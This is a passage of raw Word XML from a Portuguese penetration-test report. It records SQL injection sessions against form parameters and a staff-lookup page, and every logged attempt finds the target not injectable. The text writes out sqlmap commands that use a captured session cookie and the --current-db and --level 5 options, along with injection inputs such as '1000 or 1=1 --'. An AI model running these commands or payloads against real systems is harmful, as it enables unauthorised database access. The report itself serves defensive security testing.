          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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Tentar injeção de SQL no parâmetro “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cadastro</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Comando</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: sqlmap -r params -p cadastro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630433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O comando “-r” indica ao programa que as instruções do ataque devem ser carregadas no arquivo params.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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“-p” indica o parâmetro que deve ser injetado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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“cadastro” é o atributo que sofrerá </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de injeção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5CE" w:rsidRPr="00F15F82" w:rsidRDefault="00D975CE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D975CE" w:rsidRPr="00F15F82" w:rsidRDefault="00D975CE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spera-se que a aplicação faça o tratamento do parâmetro “cadastro”.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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lastRenderedPageBreak/>
        <w:t>Relatório de execução</w:t>
      </w:r>
      <w:r w:rsidR="001E29F7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: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 </w:t>
      </w:r>
      <w:r w:rsidR="00D76012" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs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. </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O parâmetro </w:t>
      </w:r>
      <w:r w:rsidR="00D975CE" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cadastro” </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>escolhido para teste de injeção SQL não é injet</w:t>
      </w:r>
      <w:r w:rsidR="003F64B7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ável conforme mostra a figura 19</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="005A529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C835DA0" wp14:editId="06ABAE6D">
            <wp:extent cx="5400040" cy="4126865"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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1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777DD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Figura 19</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Resultado exploração Sql Injection via Sqlmap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 7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Alterar o comando utilizado nas </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s anteriores para incluir o parâmetro “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ok</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”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Tentar injeção de SQL no parâmetro “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ok</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Comando: sqlmap -r params -p ok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630433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O comando “-r” indica ao programa que as instruções do ataque devem ser carregadas no arquivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>params</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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“-p” indica o parâmetro que deve ser injetado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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“ok” é o atributo que sofrerá </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de injeção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01063" w:rsidRPr="00F15F82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101063" w:rsidRPr="00F15F82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spera-se que a aplicação faça o tratamento do parâmetro</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00101063" w:rsidRPr="00F15F82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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> “ok”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00101063" w:rsidRPr="00F15F82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Relatório de execução</w:t>
      </w:r>
      <w:r w:rsidR="001E29F7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: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 </w:t>
      </w:r>
      <w:r w:rsidR="00D76012" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs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. </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O parâmetro </w:t>
      </w:r>
      <w:r w:rsidR="00101063" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">“ok” </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>escolhido para teste de injeção SQL não é injet</w:t>
      </w:r>
      <w:r w:rsidR="003F64B7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ável conforme mostra a figura 20</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00236FD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34F4346" wp14:editId="12D48656">
            <wp:extent cx="5400040" cy="405828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2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777DD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Figura 20</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Resultado exploração Sql Injection via Sqlmap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3.5 Tela Consulta Servidor - SQL Injection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Tarefa realizada dia 18/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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Duração total das sessões executadas</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: 1 hora e 40 minutos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Objetivo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Submeter entradas maliciosas no sistema através de injeção de códigos SQL na página de Consulta Servidor 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na </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão de teste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de forçar ações não autorizadas no sistema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.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Resultados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 1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Verificar se o campo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Siape”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> é vulnerável à injeção de código SQL fazendo uso da técnica de concatenação de aspas simples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01063" w:rsidRPr="00F15F82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Pr="00F15F82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spera-se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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>que o sistema realize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o tratamento do caractere aspa simples como um parâmetro regular da consulta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Entrada: 1000’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Relatório de execução</w:t>
      </w:r>
      <w:r w:rsidR="001E29F7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D76012"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. A aplicação realizou o tratamento de dados de entrada e não permitiu a injeção de instruções SQL através do campo de “</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Siape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”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 2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Inserir um texto com uma distribuição adequada de aspa simples e comentários inline como entrada no campo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Siape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”, a fim de modificar a instrução SQL utilizada pelo sistema na consulta de dados referentes ao siape de usuários cadastrados. Comentários inline foram utilizados na </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão de teste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de forçar o interpretador de SQL da aplicação a ignorar todas as instruções SQL que vierem após o comentário inserido.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00101063" w:rsidRPr="00F15F82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01063" w:rsidRPr="00F15F82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101063" w:rsidRPr="00F15F82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Esper-se que o sistema realize o tratamento para impedir que os comentários sejam interpretados como parte da consulta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Entradas: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1000 or 1=1 # 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1000 or 1=1  --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Relatório de execução</w:t>
      </w:r>
      <w:r w:rsidR="001E29F7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D76012"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. A aplicação realizou o tratamento de dados de entrada, não permitindo a mudança de comportamento da instrução SQL utilizada pelo sistema para consultar os dados dos usuários cadastrados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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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Tela Consulta Servidor – Exploração via Sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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Tarefa realizada nos dias 19, 20 e 22/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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Duração total das sessões executadas</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: 3 horas e 30 minutos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Objetivo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Utilizar a ferramenta Sqlmap para automatizar o processo de detecção de vulnerabilidades na tela de Consulta Servidor a partir de injeção de códigos SQL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Resultados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 1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Verificar se a tela Consulta Servidor é vulnerável a injeção de código SQL e caso haja vulnerabilidade conseguir obter o nome do banco de dados utilizado pelo sistema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Para realizar essa </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> foi necessário utilizar a ferramenta Burp Suite para capturar as informações de cookie contidas no cabeçalho HTTP de uma requisição no momento em que a página de Consulta Servidor é acessada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D038A" w:rsidRPr="00F15F82" w:rsidRDefault="000D038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E3243AB" wp14:editId="695AF154">
            <wp:extent cx="4486275" cy="12382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23(Editada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777DD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Figura 21</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Parâmetros obtidos através do Burp Suite.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Entrada: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00B01036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01036">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>./sqlmap.py -u "http://IP_do_servidor/</w:t>
      </w:r>
      <w:r w:rsidR="002D4365" w:rsidRPr="00B01036">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nomeSistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01036">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/index.php?pg=servidores"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--cookie="PHSESSID=75ce718b37088517cafla733d53c60f" --current -db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63043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2552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“./sqlmap.py” comando utilizado para executar a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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2552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“-u” especifica a URL alvo da página a ser explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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2552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“--cookie” especifica um cookie de sessão válido a ser passado para o Sqlmap durante o ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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2552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“--current -db” comando utilizado para obter o nome do banco de dados utilizado pelo sistema alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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65D65" w:rsidRPr="00F15F82" w:rsidRDefault="00D65D6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Pr="00F15F82" w:rsidRDefault="00D65D6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spera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-se que a tela de Consulta servidor não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seja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vulnerável à injeção de SQL e consequentemente não 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seja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possível descobrir o nome do banco de dados utilizado pela aplicação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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Relatório de execução</w:t>
      </w:r>
      <w:r w:rsidR="001E29F7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D76012" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Não possível encontrar vulnerabilidade na página e consequentemente não foi possível descobrir o nome do banco de dados utilizado no sistema.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As figuras 2</w:t>
      </w:r>
      <w:r w:rsidR="00605CFE" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2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="00605CFE" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e 23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mostram os resultados do Sqlmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00022ED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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidR="001C4F4D" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F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0E9073E" wp14:editId="66C7CCA8">
            <wp:extent cx="5400040" cy="4054475"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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4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777DD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Figura 22</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Resultado exploração SQL Injection via Sqlmap – Parte 1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04EFF" w:rsidRPr="00F15F82" w:rsidRDefault="00F04EF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A0341E5" wp14:editId="0A03A125">
            <wp:extent cx="5428615" cy="4064635"/>
            <wp:effectExtent l="0" t="0" r="635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25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777DD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lastRenderedPageBreak/>
        <w:t>Figura 23</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Resultado exploração SQL Injection via Sqlmap – Parte 2.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 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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Repetir a ação da </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 e aumentar o nível de heurística </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>aplicada pelo Sqlmap na injeção de SQL para o valor máximo: 5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Entrada: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00B01036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01036">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>./sqlmap.py -u "http://IP_do_servidor/</w:t>
      </w:r>
      <w:r w:rsidR="002D4365" w:rsidRPr="00B01036">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nomeSistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01036">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/index.php?pg=servidores"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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--cookie="PHSESSID=75ce718b37088517cafla733d53c60f" --current -db  --level 5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8C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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ind w:left="2552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“./sqlmap.py” comando utilizado para executar a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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ind w:left="2552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“-u” especifica a URL alvo da página a ser explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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ind w:left="2552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“--cookie” especifica um cookie de sessão válido a ser passado para o SQL MAP durante o ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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ind w:left="2552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“--current -db” comando utilizado para obter o nome do banco de dados utilizado pelo sistema alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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ind w:left="2552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 “--level 5” comando utilizado para aumentar o nível da heurística utilizada no escaneamento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473CA" w:rsidRPr="00F15F82" w:rsidRDefault="006473C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473CA" w:rsidRPr="00F15F82" w:rsidRDefault="006473C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473CA" w:rsidRPr="00F15F82" w:rsidRDefault="006473C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Pr="00F15F82" w:rsidRDefault="006473C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spera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-se que a tela Consulta Servidor não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seja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vulnerável à injeção de SQL e consequentemente não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seja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possível descobrir o nome do banco de dados utilizado pela aplicação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Relatório de execução</w:t>
      </w:r>
      <w:r w:rsidR="001E29F7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
